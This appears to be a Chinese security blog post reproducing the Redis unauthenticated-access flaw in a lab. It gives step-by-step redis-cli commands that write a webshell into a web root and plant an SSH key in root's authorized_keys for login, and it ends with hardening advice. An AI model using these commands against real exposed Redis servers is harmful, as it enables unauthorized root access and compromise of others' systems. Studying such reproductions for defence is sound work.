Redis未授权漏洞复现

Redis未授权漏洞复现,第1张

Redis未授权漏洞复现 简介

        Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件 *** 作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等 *** 作。

环境搭建

下载redis软件包:

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

tar xzvf redis-2.8.17.tar.gz #解压安装包

cd redis-2.8.17        #进入redis目录

make             #编译

cp usr/redis-server /usr/bin/

cp usr/redis-cli /usr/bin/   #将redis-server和redis-cli拷贝到/usr/bin目录下

cp redis.conf /etc/       #将redis.conf拷贝到/etc/目录下

redis-server /etc/redis.conf   #使用/etc/目录下的redis.conf文件中的配置启动

redis-server启动redis数据库服务:

redis客户端“redis-cli”.

漏洞利用 写入webshell

需要目标开启了网页服务,然后写webshell到网站目录。

可以先使用nmap探测一下:

利用:

redis-cli -h ip -p port  #不指定端口的话默认是6379

info

config set dir /var/www/html

config set dbfilename redis-test.php

set test-webshell ""

save

然后查看一下目标机器这边网页目录:

成功写入。

SSH免密码登录

将自己的公钥储存在远程主机上,登录时远程主机会向用户发送一段随机字符串,用自己的私钥加密后再发回来。远程主机用事先储存的公钥进行解密,如果成功则允许直接空密码ssh登录。

先探测ssh端口开放:

在本地生成公钥文件(回车默认即可):

 ssh-keygen -t rsa

生成的文件路径在用户的家目录的".ssh"文件夹下:

cd ~/.ssh | ls

将秘钥写入一个文件用于查看并上传redis服务器:

(echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt

将key.txt里面的内容写入远程的 Redis 服务器上并且设置其 Key为一个命令(这里设置的test):

如果上传报错的话,可能是主机处于保护模式只允许redis本地链接,需要修改配置文件../redis.conf 需要在服务器上关闭保护模式:

redis-cli -h ip -p port

config set protected-mode no

然后再尝试一下上传,返回ok即上传成功。

登录redis服务器查看公钥已经添加到 Redis 的服务器上了并执行如下命令:

keys *

get test

config set dir /root/.ssh

config set dbfilename authorized_keys

save

测试ssh登录:

ssh -i id_rsa root@ip

 登录成功。

 

修复建议

1./etc/redis.conf 中找到 “requirepass” 字段在后面设置复杂口令

2./etc/redis.conf中配置protected-mode yes

3.更改默认端口


结语

已无暇顾及过去,要向前走。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5619570.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-15
下一篇 2022-12-15

发表评论

登录后才能评论

评论列表(0条)

保存